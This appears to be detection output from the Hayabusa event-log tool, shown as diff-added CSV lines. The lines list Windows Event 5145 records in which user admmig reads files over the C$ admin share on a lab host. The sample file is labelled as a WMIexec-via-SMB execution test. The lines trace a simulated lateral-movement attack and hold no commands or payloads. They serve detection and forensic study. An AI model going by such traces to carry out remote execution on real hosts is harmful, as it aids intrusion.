+2021-04-22 20:32:31.937 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W2d29a719#\d0b3dad21720f265098f1e94984349f8  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.937 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W2d6979e4#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.937 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W2d6979e4#\3e37b5062bf0419283b3384af5deb445  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.937 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W2ded559f#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.937 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W2ded559f#\7d512c9625a371ff23fac5628a0e68f9  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.953 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W3cdb5602#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.953 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W3cdb5602#\6423a4306ce0876f0093a7f421bb7e5a  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.969 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W6c95e797#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.969 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W6c95e797#\8780975ab811e02b5246582c27ea6cda  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.969 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W6dcfceb1#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.969 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W6dcfceb1#\64783b930c916ed9a5041885582dd1f1  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.969 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W7b7c0837#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.969 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W7b7c0837#\fa70f9411efd4c4e624a68d30b61b1b7  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.984 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W9e7db7c5#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.984 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W9e7db7c5#\129a7094f09543b72571da3208c88188  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.984 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W9e8926d3#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.984 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W9e8926d3#\86d7c67af3a964bb8d312cffb20064f4  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.984 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W15cd0137#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.984 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W15cd0137#\37435834252683aa469b56ff5b1fa582  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.000 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W37d1a032#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.000 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W37d1a032#\3000cd8689f492cfebdd90745d8ff4f5  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.000 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W39c436dd#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.000 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W39c436dd#\1e419fc634fa508e323ce21b5ed38e24  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.015 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W69ef49d2#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.015 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W69ef49d2#\3904c1c8a3c65252ed404558b48ebbc1  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.015 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W71daf281#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.015 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W71daf281#\4dc6f876453e5e2ebf2a9ee674543449  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.015 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W81a3882f#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.031 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W81a3882f#\a85f95161dcf12987a79a1b41adbdb9c  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.031 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W708fc392#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.031 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W708fc392#\8f2dcf5025667bf632e62398c422a6da  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.031 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W5052cbb1#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.031 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W5052cbb1#\3d4dc36b565611250515cd25ebe64bed  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.050 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W57798b05#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.050 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W57798b05#\a9ccbdffc3a6a0fca980872c1531aa02  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.050 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W73044bb5#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.050 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W73044bb5#\ca9e965c5eab4b76dc40c510a6a4a916  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.050 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W193497eb#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.050 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W193497eb#\2ebfdca668bed840047e6bcbeec44e53  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.064 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W08054466#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.064 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W08054466#\728711ada9b68483d998f34ac723c295  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.064 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wad38fd8b#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.064 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wad38fd8b#\9158e541821e2b6d43c32648464e77c2  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.079 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wad78daf4#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.079 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wad78daf4#\81b597084cf1f78a1957cf8138744f32  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.096 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\admmig\desktop.ini  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.099 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wb2d030b7#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.099 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wb2d030b7#\fa5c1a0df187c30480b0623065a70395  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.099 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wb2d06916#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.099 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wb2d06916#\d61b7f885a9fd4f4766031b996ca7d6a  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.099 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wb9b5bb58#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.114 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\admmig  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.114 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wb9b5bb58#\094367b5bb80758c8f0ab02018658d91  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.130 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: USERS\ADMMIG  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.130 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\admmig\Contacts\desktop.ini  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.130 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\admmig  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
